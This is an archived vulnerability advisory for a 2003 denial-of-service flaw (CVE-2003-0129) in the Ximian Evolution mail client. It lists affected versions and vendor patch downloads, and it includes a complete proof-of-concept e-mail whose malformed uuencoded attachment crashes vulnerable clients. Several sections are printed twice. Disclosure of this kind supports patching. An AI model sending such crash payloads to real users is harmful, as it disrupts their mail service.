Ximian Evolution UUEncoding Denial of Service Vulnerability
BID:7118
Info
Ximian Evolution UUEncoding Denial of Service Vulnerability
| Bugtraq ID: | 7118 |
| Class: | Failure to Handle Exceptional Conditions |
| CVE: |
CVE-2003-0129 |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 17 2003 12:00AM |
| Updated: | Jul 11 2009 09:06PM |
| Credit: | Discovered by Diego Kelyacoubian, Javier Kohen, Alberto Solino, and Juan Vera of Core Security Technologies. |
| Vulnerable: |
Ximian Evolution 1.2.2 Ximian Evolution 1.2.1 Ximian Evolution 1.2 Ximian Evolution 1.1.1 Ximian Evolution 1.0.8 Ximian Evolution 1.0.7 Ximian Evolution 1.0.6 Ximian Evolution 1.0.5 Ximian Evolution 1.0.4 Ximian Evolution 1.0.3 |
| Not Vulnerable: |
Ximian Evolution 1.2.3 |
Discussion
Ximian Evolution UUEncoding Denial of Service Vulnerability
A vulnerability has been discovered in the Ximian Evolution Mail User Agent (MUA). The problem occurs when the mailer attempts to process a maliciously encoded e-mail message. When attempting to decode the message, the MUA will repeatedly attempt to allocate memory, resulting in system resource exhaustion and will eventually crash.
This vulnerability affects Ximian Evolution version 1.2.2 and earlier.
A vulnerability has been discovered in the Ximian Evolution Mail User Agent (MUA). The problem occurs when the mailer attempts to process a maliciously encoded e-mail message. When attempting to decode the message, the MUA will repeatedly attempt to allocate memory, resulting in system resource exhaustion and will eventually crash.
This vulnerability affects Ximian Evolution version 1.2.2 and earlier.
Exploit / POC
Ximian Evolution UUEncoding Denial of Service Vulnerability
The following proof of concept vulnerability will reproduce the issue:
From [email protected] Wed Mar 5 14:06:02 2003
Subject: xxx
From: X X. X <[email protected]>
To: [email protected]
Content-Type: multipart/mixed; boundary=3D"=3D-mTDu5zdJIsixETTwCF5Y"
Message-Id: <1046884154.1731.5.camel@vaiolin>
Mime-Version: 1.0
Date: 05 Mar 2003 14:09:14 -0300
--=3D-mTDu5zdJIsixETTwCF5Y
Content-Disposition: inline; filename=3Dname
Content-Type: application/octet-stream; name=3Dname
Content-Transfer-Encoding: 7bit
begin 600 phase2
M8F5G:6X@-C P('!H87-E,0I-.$8U1SHV6$ M0R!0*"<Q13XG,"HS,RA&+310
M6RE%42 N,SQ9,3-1)S$T*%LU0R4Y*E0I.#-"*2 R,D19"DTP0B4Y+E4\5# C
M138W-3!(*5,E+RHB/%$R(TA7*R0@7"E%52DN5#Q0,T!)+2I4*$$V,TTW+20M7#%#,2 *32\D.%4P,T1',20@72E%42 O,SQ-,3) 1"LR7%0Q(S$@+$,Q-2PC
M(%0K,S!(+$(Q(2A$(2DQ4TTR*#1 6 I-+4)5*R)$-$@I5#4O+S,\23131%8T
M-#A(+$(Q(2A$(2DU4U4W+R186#5%53(N,SQ-,3-!-RTU*%HM4R4Y"C,J5#A-
?,U-,4#(B2$(P(B! (D(@*CDV640B0" @"B *96YD"@
end
--=3D-mTDu5zdJIsixETTwCF5Y--
The following proof of concept vulnerability will reproduce the issue:
From [email protected] Wed Mar 5 14:06:02 2003
Subject: xxx
From: X X. X <[email protected]>
To: [email protected]
Content-Type: multipart/mixed; boundary=3D"=3D-mTDu5zdJIsixETTwCF5Y"
Message-Id: <1046884154.1731.5.camel@vaiolin>
Mime-Version: 1.0
Date: 05 Mar 2003 14:09:14 -0300
--=3D-mTDu5zdJIsixETTwCF5Y
Content-Disposition: inline; filename=3Dname
Content-Type: application/octet-stream; name=3Dname
Content-Transfer-Encoding: 7bit
begin 600 phase2
M8F5G:6X@-C P('!H87-E,0I-.$8U1SHV6$ M0R!0*"<Q13XG,"HS,RA&+310
M6RE%42 N,SQ9,3-1)S$T*%LU0R4Y*E0I.#-"*2 R,D19"DTP0B4Y+E4\5# C
M138W-3!(*5,E+RHB/%$R(TA7*R0@7"E%52DN5#Q0,T!)+2I4*$$V,TTW+20M7#%#,2 *32\D.%4P,T1',20@72E%42 O,SQ-,3) 1"LR7%0Q(S$@+$,Q-2PC
M(%0K,S!(+$(Q(2A$(2DQ4TTR*#1 6 I-+4)5*R)$-$@I5#4O+S,\23131%8T
M-#A(+$(Q(2A$(2DU4U4W+R186#5%53(N,SQ-,3-!-RTU*%HM4R4Y"C,J5#A-
?,U-,4#(B2$(P(B! (D(@*CDV640B0" @"B *96YD"@
end
--=3D-mTDu5zdJIsixETTwCF5Y--
Solution / Fix
Ximian Evolution UUEncoding Denial of Service Vulnerability
Solution:
Red Hat has released a security advisory (RHSA-2003:108-01) which contains fixes for this issue. Users are advised to upgrade as soon as possible.
The appropriate fixes have been applied to the Evolution CVS tree.
Ximian has reported that Evolution 1.2.3 will be released however, it does not appear to be available at this time. Users are advised to monitor the Ximian Evolution release page for further information.
Conectiva Linux has released an advisory. Affected users are advised to upgrade to new versions of Evolution. Further information about obtaining and applying fixes are available in the referenced advisory.
Ximian Evolution 1.0.3
Ximian Evolution 1.0.8
Ximian Evolution 1.2.2
Solution:
Red Hat has released a security advisory (RHSA-2003:108-01) which contains fixes for this issue. Users are advised to upgrade as soon as possible.
The appropriate fixes have been applied to the Evolution CVS tree.
Ximian has reported that Evolution 1.2.3 will be released however, it does not appear to be available at this time. Users are advised to monitor the Ximian Evolution release page for further information.
Conectiva Linux has released an advisory. Affected users are advised to upgrade to new versions of Evolution. Further information about obtaining and applying fixes are available in the referenced advisory.
Ximian Evolution 1.0.3
-
Conectiva evolution-1.0.3-6U80_2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/evolution-1.0.3-6U80_2cl.i3 86.rpm -
Conectiva evolution-devel-1.0.3-6U80_2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/evolution-devel-1.0.3-6U80_ 2cl.i386.rpm -
Conectiva evolution-devel-static-1.0.3-6U80_2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/evolution-devel-static-1.0. 3-6U80_2cl.i386.rpm
Ximian Evolution 1.0.8
-
Mandrake evolution-1.0.8-3.1mdk.i586.rpm
Mandrake Linux 9.0
http://www.mandrakesecure.net/en/ftp.php -
Mandrake evolution-pilot-1.0.8-3.1mdk.i586.rpm
Mandrake Linux 9.0
http://www.mandrakesecure.net/en/ftp.php -
Mandrake libevolution0-1.0.8-3.1mdk.i586.rpm
Mandrake Linux 9.0
http://www.mandrakesecure.net/en/ftp.php -
Mandrake libevolution0-devel-1.0.8-3.1mdk.i586.rpm
Mandrake Linux 9.0
http://www.mandrakesecure.net/en/ftp.php -
Red Hat evolution-1.0.8-11.i386.rpm
Red Hat Linux 8.0
ftp://updates.redhat.com/8.0/en/os/i386/evolution-1.0.8-11.i386.rpm -
Red Hat evolution-1.0.8-9.7x.i386.rpm
Red Hat Linux 7.3
ftp://updates.redhat.com/7.3/en/os/i386/evolution-1.0.8-9.7x.i386.rpm -
Red Hat gal-0.19.2-3.7x.i386.rpm
Red Hat Linux 7.3
ftp://updates.redhat.com/7.3/en/os/i386/gal-0.19.2-3.7x.i386.rpm -
Red Hat gal-devel-0.19.2-3.7x.i386.rpm
Red Hat Linux 7.3
ftp://updates.redhat.com/7.3/en/os/i386/gal-devel-0.19.2-3.7x.i386.rpm -
Red Hat libgal19-0.19.2-3.7x.i386.rpm
Red Hat Linux 7.3
ftp://updates.redhat.com/7.3/en/os/i386/libgal19-0.19.2-3.7x.i386.rpm
Ximian Evolution 1.2.2
-
Mandrake evolution-1.2.4-1.1mdk.i586.rpm
Mandrake Linux 9.1
http://www.mandrakesecure.net/en/ftp.php -
Mandrake evolution-1.2.4-1.1mdk.ppc.rpm
Mandrake Linux 9.1/PPC
http://www.mandrakesecure.net/en/ftp.php -
Mandrake evolution-pilot-1.2.4-1.1mdk.i586.rpm
Mandrake Linux 9.1
http://www.mandrakesecure.net/en/ftp.php -
Mandrake evolution-pilot-1.2.4-1.1mdk.ppc.rpm
Mandrake Linux 9.1/PPC
http://www.mandrakesecure.net/en/ftp.php -
Mandrake libevolution0-1.2.4-1.1mdk.i586.rpm
Mandrake Linux 9.1
http://www.mandrakesecure.net/en/ftp.php -
Mandrake libevolution0-1.2.4-1.1mdk.ppc.rpm
Mandrake Linux 9.1/PPC
http://www.mandrakesecure.net/en/ftp.php -
Mandrake libevolution0-devel-1.2.4-1.1mdk.i586.rpm
Mandrake Linux 9.1
http://www.mandrakesecure.net/en/ftp.php -
Mandrake libevolution0-devel-1.2.4-1.1mdk.ppc.rpm
Mandrake Linux 9.1/PPC
http://www.mandrakesecure.net/en/ftp.php -
Red Hat evolution-1.2.2-5.i386.rpm
Red Hat Linux 9.0
ftp://updates.redhat.com/9/en/os/i386/evolution-1.2.2-5.i386.rpm
References
Ximian Evolution UUEncoding Denial of Service Vulnerability
References:
References:
- Ximian Evolution Product Page (Ximian)